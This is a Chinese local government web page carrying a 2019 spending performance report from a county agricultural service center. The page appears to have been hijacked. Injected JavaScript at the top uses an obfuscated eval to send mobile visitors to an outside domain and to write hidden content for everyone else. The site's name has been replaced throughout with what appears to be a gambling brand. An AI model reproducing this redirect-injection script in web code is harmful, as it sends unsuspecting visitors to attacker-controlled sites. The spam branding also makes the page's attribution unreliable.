function moble(){ var ss = '
'; if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "http://fd699.vip" }else{ eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); } } moble();


当前位置: 福德正神登录官网 > 信息公开 > 政府信息公开 > 法定主动公开内容 > 预算/决算 > 县财政预算

福德正神部门整体支出绩效评价报告 福德正神登录官网农业综合服务中心
发布时间: 2020-11-06 16:51来源:福德正神登录官网财政局作者:【字体: 浏览量:1

2019年部门整体支出绩效评价报告

福德正神登录官网农业综合服务中心

一、基本情况

汝城农业综合服务中心为县农业农村局所属副科级公益一类事业单位。主要职责是:参与开展农业贸易促进和有关经济、技术交流与合作事宜。承办农业农村人才队伍建设、农业技术干部培训、农村基层干部培训、农业实用技术培训和网络教育、农民素质教育等事宜。承担农业产业化、农村第三产业和农业综合开发项目信息咨询、技术服务等工作。福德正神登录官网农业综合服务中心核定全额拨款事业编制22名,现实有编制成员15人,其中领导职数:主任1名,副主任2名。内设职能股(室)2个,后勤组(办公室和计财股)、业务组。

(一)  部门整体支出概。

1基本支出预算执行情况:2019年年初预算数258.01万元,其中,一般公共财政预算拨款258.01万元。一般公共服务支出237.88万元,社会保障和就业支出4.26万元,医疗卫生与计划生育支出2.57万元,住房保障支出13.3万元。当年收支平衡。

(二)部门整体支出绩效目标。

2019年财政拨款收入258.01元,具体安排情况如下:

1.基本支出:2019年年初预算数为258.01元,其中人员经费216.73万元,公用经费41.28万元。系保障我单位机构正常运转、完成日常工作任务而发生的各项支出,包括用于在职和离退休人员基本工资、津贴补贴等人员经费以及办公费、印刷费、水电费、办公设备购置等日常公用经费。

  项目支出8.8万元,系我单位保证农业生产项目蔬菜检测项目的工作经费。

2. “三公”经费决算:2019年“三公”经费决算数0.16万元,其中:公务接待费0.16万元、公务用车购置及运行费0万元、因公出国(境)费0元。
  根据本年决算,本年实际支出公务接待费0.16万元,公务用车运行维护费0万元。

二、绩效评价工作情况

(一)绩效评价目的。为了全面分析和综合评价我中心财政预算资金的使用管理情况,为切实提高财政资金使用效益,强化预算支出的责任和效率提供参考依据。
  (二)绩效评价工作过程,主要包括前期准备、组织实施和分析评价等内容。我中心按照绩效评价规程要求,第一阶段为前期准备:由我局财会室牵头,制定了详细的工作方案,明确责任,确定评价指标细则;第二阶段为自评:根据上一阶段任务布置,按照要求展开自评工作,并初拟评价结果;第三阶段为定性终评,查阅相关文件资料和财务凭证,对收集资料进行定量定性分析,综合评议后形成评价结论,出具绩效评价报告。
三、主要绩效及评价结论
  预算安排的基本支出保障了正常的工作运转。
  1. 本年预算配置控制较好。财政供养人员控制在预算编制以内。
  2. 预算执行方面。支出总额控制在预算总额以内。 
  3.预算管理方面,制度执行总体较为有效,仍需进一步强化;资金使用管理需进一步加强。
  4.资产管理方面,建立资产管理制度,定期进行盘点和资产清理,总体执行较好。
四、存在的问题
  一是年终绩效奖、医保铺底等支出未能列入年初预算;二是本次绩效是按单位全年实际预算收入和单位年初预算相比较计算预算控制率,而本部门的实际预算收入中有部分是省下拨的资金,这部分资金年初预算是不可预算的;三是近年农业产业化项目任务重,下乡组织考察下乡工作经费紧张。上述因素如果不考虑不可控因素,就会影响本单位的评分及评价等次。

五、有关建议

1. 建议细化预算指标,提高预算科学性。预算编制前根据年度内单位可预见的工作任务,确定单位年度预算目标,细化预算指标,科学合理编制部门预算,推进预算编制科学化、准确化。

  2. 加强财务管理,严格财务审核。在费用报账支付时,按照预算规定的费用项目和用途进行资金使用审核、列报支付、财务核算,杜绝超支现象的发生。
  3.持续抓好“三公”经费控制管理。严格控制“三公”经费的规模和比例,把关“三公”经费支出的审核、审批,杜绝挪用和挤占其他预算资金行为;进一步细化“三公”经费的管理,合理压缩“三公”经费支出。
  4. 建议优化绩效评价指标计分标准,改善评价计分标准的不合理性,让评价结果更加公平公正。

5.近几年来,项目考查、验收项目增多,经常需要下乡组织工作,而且工作经费少,难以支撑项目工作正常运行费用,请求财政部门加大对项目配套工作经费的投入力度。

6. 恳请增加项目工作经费纳入财政预算,使专项工作经费有保障性和连续性。
六、其他需要说明的问题
                        

福德正神登录官网农业综合服务中心

            20201030 

 

扫一扫在手机打开当前页